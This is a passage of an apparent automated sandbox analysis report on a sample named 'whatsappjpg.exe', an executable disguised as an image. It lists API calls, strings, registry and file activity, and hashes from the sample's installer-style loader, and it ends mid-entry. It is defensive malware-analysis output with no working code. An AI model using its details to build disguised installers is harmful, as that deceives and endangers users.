Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 00403C55 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,?), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Strings

kS, xrefs: 00404004

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: kS
API String ID: 3282139019-2421827262
Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 00403933
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(Call), ref: 004039D1
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
"C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 004038B5
Call, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
.exe, xrefs: 004039C0
.DEFAULT\Control Panel\International, xrefs: 0040391E
_Nb, xrefs: 00403A36, 00403A9E
RichEdit, xrefs: 00403B0D
RichEd20, xrefs: 00403AE6
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
1033, xrefs: 004038D2, 0040392E
RichEdit20W, xrefs: 00403AFE, 00403B04
C:\Users\user\Uploadable\normallnnens, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
RichEd32, xrefs: 00403AF1

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-1820613078
Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\whatsappjpg.exe,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
soft, xrefs: 00402EAA
"C:\Users\user\Desktop\whatsappjpg.exe", xrefs: 00402DC3
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
Null, xrefs: 00402EB3
Inst, xrefs: 00402EA1
C:\Users\user\Desktop\whatsappjpg.exe, xrefs: 00402DD4, 00402DE3, 00402DF7, 00402E14
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Error launching installer, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\whatsappjpg.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\whatsappjpg.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3136287766
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 10001B3E Relevance: 20.0, APIs: 13, Instructions: 542stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
GlobalFree.KERNEL32(00000000), ref: 10001CAF
GlobalFree.KERNEL32(?), ref: 10001DA9
GlobalFree.KERNEL32(?), ref: 10001DAE
GlobalFree.KERNEL32(?), ref: 10001DB3
GlobalFree.KERNEL32(00000000), ref: 10001F57
lstrcpyW.KERNEL32(?,?), ref: 100020BB

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll
API String ID: 2531174081-3000552427
Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,0040F2DB,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(00006E9F,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

x>A, xrefs: 004031F0

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: x>A
API String ID: 2146148272-3854404225
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA

Strings

C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp, xrefs: 0040237E, 004023A3, 004023B3, 004023BE

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp
API String ID: 1356686001-491460166
Opcode ID: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
Opcode Fuzzy Hash: ccfe9803d7e227ab7e2a72a0b4861a967dbf62cf09f9511f26540d48752b467a
Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,76F92EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\whatsappjpg.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Uploadable\normallnnens,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\Uploadable\normallnnens, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\Uploadable\normallnnens
API String ID: 3751793516-3974840194
Opcode ID: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 3d83efa2bc4fe2806ed3000ea967517c516f08bd89cd182248c21611bd136b71
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 10001771 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3

GlobalFree.KERNEL32(00000000), ref: 1000181C
FreeLibrary.KERNEL32(?), ref: 10001893
GlobalFree.KERNEL32(00000000), ref: 100018B8

Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,004050A3), ref: 100022D3

Part of subcall function 10002614: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 10002686

Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5

Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002562
Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 1000258B

Strings

, xrefs: 10001899

Memory Dump Source

Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpywsprintf
String ID:
API String ID: 1767494692-3916222277
Opcode ID: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction ID: f1aa1b9103b0a65f35aec93e8e69466a872eebdec6ee13635525f9d4203f99a4
Opcode Fuzzy Hash: 1685173ce3d2b65da630a914681d80644a307c638f4ca4f93a48449925dcaf4b
Instruction Fuzzy Hash: 9931BF799042459AFB10DF74DCC5BDA37E8EB043D4F058529FA0AAA08EDF74A985C760

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
